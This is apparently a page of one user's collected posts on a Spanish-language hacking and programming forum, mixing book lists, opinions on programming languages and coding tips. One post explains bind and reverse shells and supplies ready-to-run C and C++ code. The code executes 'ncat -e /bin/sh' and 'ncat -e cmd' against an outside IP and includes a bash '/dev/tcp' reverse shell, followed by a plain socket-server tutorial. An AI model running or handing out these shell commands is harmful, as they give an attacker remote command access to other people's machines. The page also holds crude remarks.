Mensajes

Ya ves, o eres un anal

Menos mal que llego internet, que tambien es perseguida, cuidado con compartir obras, que ahora tienen la escusa de que tienen derecho de autor para evitar que la gente tambien lea.

Jaja te montas un nodo de salida de tor y se te llena el email de siglas. Eula Aula Loula Sopa Sapo Eulalia... Parece un servicio SMS de subscripción para Adultos.

Es una pena.

Se van a cargar el sector ellos mismos xD

Necesitas 2 programas. Un cliente y un servidor. Puede ser conexión directa, el objetivo tiene los puertos abiertos. O conexión inversa, tu tienes los puertos abiertos. También se puede sin abrir puertos pero requiere de settup, proxy y tunelaje.

Puedes usar sockets o alguna librería/software como netcat o includo bash/batch, perl, php, etc. Facilita mucho.

Un ejemplo:

Código (cpp) [Seleccionar] Expandir

#include <string>

using namespace std;

#define PUERTO static_cast<string>("9090")
#define IP static_cast<string>("127.0.0.1")
#define REVERSE_IP static_cast<string>("93.184.216.34")

void BindShell(string);

int main() {

string comando = "";

#ifdef __linux__ /* LINUX */
/* Bind Local Shell */
BindShell("ncat -l -k " + IP + " " + PUERTO + " -e /bin/sh");

/* Bind Remote Shell */
BindShell("ncat " + REVERSE_IP + " " + PUERTO + " -e /bin/sh");

/* Bind Remote Shell Bash */
BindShell("bash -i >& /dev/tcp/" + REVERSE_IP + "/" + PUERTO + " 0>&1");



#else /* WINDOWS */
/* Bind Local Shell */
BindShell("ncat -l -k " + IP + " " + PUERTO + " -e cmd");

/* Bind Remote Shell */
BindShell("ncat " + REVERSE_IP + " " + PUERTO + " -e cmd");

#endif
return 0;
}

void BindShell(string command) {
system(command.c_str());
}

O incluso puedes compilar esto en C con gcc sin libs ni nada:

Código (c) [Seleccionar] Expandir

int main() {
system("ncat 127.0.0.1 9090 -e /bin/sh");
return 0;
}

Para sockets Linux usa <sys/socket.h> para funciones y
<netinet/in.h> para sockaddr_in.

Creas el socket (IPv4, TCP) y obtienes en retorno un file descriptor con:

Código (cpp) [Seleccionar] Expandir

int sockfd = socket(AF_INET, SOCK_STREAM, 0);

if (sockfd == -1) {
std::cout << "Failed to create socket. Errno: " << errno << std::endl;
exit(EXIT_FAILURE);
}

exit y la constante están en <cstdlib> cout y endl en <iostream>

Después creas la dirección con sus propiedades obligadas, dirección IP, PUERTO y demás. Y bindeas el sockaddr al sockfd

Código (cpp) [Seleccionar] Expandir

sockaddr_in sockaddr;
sockaddr.sin_family = AF_INET;
sockaddr.sin_addr.s_addr = INADDR_ANY;
sockaddr.sin_port = htons(9090);

if (bind(sockfd, (struct sockaddr*)&sockaddr, sizeof(sockaddr)) < 0) {
std::cout << "Failed to bind to port 9090. Errno: " << errno << std::endl;
exit(EXIT_FAILURE);
}

Te pones a la escucha en el socket con listen:

Código (cpp) [Seleccionar] Expandir

if (listen(sockfd, 10) < 0) {
std::cout << "Failed to listen on socket. Errno: " << errno << std::endl;
exit(EXIT_FAILURE);
}

Obtienes una conexión de la cola:

Código (cpp) [Seleccionar] Expandir

auto addrlen = sizeof(sockaddr);
int connection = accept(sockfd, (struct sockaddr*)&sockaddr, (socklen_t*)&addrlen);

if (connection < 0) {
std::cout << "Failed to grab connection. Errno: " << errno << std::endl;
exit(EXIT_FAILURE);
}

Tras obtener la conexion lees los bytes de la misma:

Código (cpp) [Seleccionar] Expandir

char buffer[8192];
auto bytesRead = read(connection, buffer, 8192);
std::cout << "The message was: " << buffer;

Por último puedes recorrer el buffer buscando algo, send para responder, cerrar el sockfd o la conexión, o lo que veas. Esto ya entra dentro de lo que quieras hacer y de tu propia implementación.

Prácticamente todo código lo hice mirando por la docu oficial de <sys/socket.h>

Informática:

The Principles of object-oriented javascript. Nicholas C. Zakas.

Eloquent javascript. Marjin Haverbeke.

Vue.js 2 Cookbook. Andrea Passaglia.

Google Hacking for penetration testers. Jonhy Long, Bill Gardner, Justing Brown.

Android Hacker's Handbook. Joshua J. Drake, Pau Oliva Fora...

Wireshark Network Analysis. Laura Chappell.

The Radare2 book. pancake.



Otros:

Speed Reading. Tony Buzan.

Muay Thai Unleashed. Erich Krauss and Glen Cordoza.

Mi Lucha. Adolf Hitler. Jusego-Chile

https://www.paypal.com/us/webapps/mpp/standard-integration

Pasas el código?

Igual algún día lo hago con Android grabando la pantalla y mandando las teclas por wi-fi. Tiene que estar graciosa la setup pero lo de procesar video tiene curro.

Pasa más código, aquí no enseñas nada.

Chequea si tienes un <meta http-equiv... un algo.submit o algo así. Hay tantas formas... Mejor que pases el código.

Código (cpp) [Seleccionar] Expandir

unsigned uint8_t utf8BOM[] = {0xEF,0xBB,0xBF};
fileStream.write(utf8BOM,sizeof(utf8BOM));

Añádele la codificación al archivo.

A mi Python junto con Java me parecen horribles. Marketing empresarial puro y duro, lo que fuerza a la comunidad a moverse y desarrollar ahí. Como lenguajes como tal... Igual es cosa mía que por lo general me da sida usar alto nivel. Están bien para hacer alguna cosilla, pero si tuviese que programar en ellos a diario me quedaría como una ameba.

Me flipa javascript vanilla. Básicamente te deja hacer lo que te salga de la p*lla. Nada de supersets ni undersets de moda xD.

Me encanta usar funciones puras para todo. Hasta tengo libs para usar wrapers de métodos con la sintaxis de funciones. Me parece la forma más sencilla, ágil y eficaz de programar.

Que sea un lenguaje web no significa que todo el software sea de uso "web". Perfectamente puedes hacer un compilador de C++ 100% en javascript vanilla y que se ejecute en cualquier navegador abriendo un html. A parte de spft como electron o node.js entre otros que te permiten desarrollo clásico de escritorio.

Me cambién totalmente a js debido a la multiplataforma.